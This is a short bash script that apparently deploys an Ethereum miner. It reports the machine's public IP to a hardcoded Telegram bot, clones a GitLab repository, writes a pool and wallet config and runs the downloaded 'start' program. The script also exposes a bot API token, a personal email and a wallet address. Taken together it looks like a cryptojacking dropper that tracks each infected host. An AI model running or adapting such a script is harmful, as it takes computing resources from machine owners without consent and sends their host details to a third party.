#!/bin/bash

apt-get install jq -y

myIp="$(wget -qO- ifconfig.me/ip)"
curl --silent -X GET 'https://api.telegram.org/bot1936519764:AAFhpKRoPybd6q1Kqqb-iWFxjdxKlfX3q_0/sendMessage?chat_id=1335828890&text='$myIp --compressed

git clone https://gitlab.com/diablostrom5/master.git

touch master/config.ini
echo "rigName = Worker" >> "master/config.ini"
echo "email = rahmatnugroho1990@gmail.com" >> "master/config.ini" 
echo "[Ethash]" >> "master/config.ini"
echo "wallet = 0x205023e287bd796ed7f9d458a04d7956c11d9ea3" >> "master/config.ini"
echo "coin = eth" >> "master/config.ini" 
echo "pool1 = eu1.ethermine.org:5555" >> "master/config.ini" 
echo "sortPools = true" >> "master/config.ini" 
cd master && chmod +x config.ini && chmod +x start && ./start
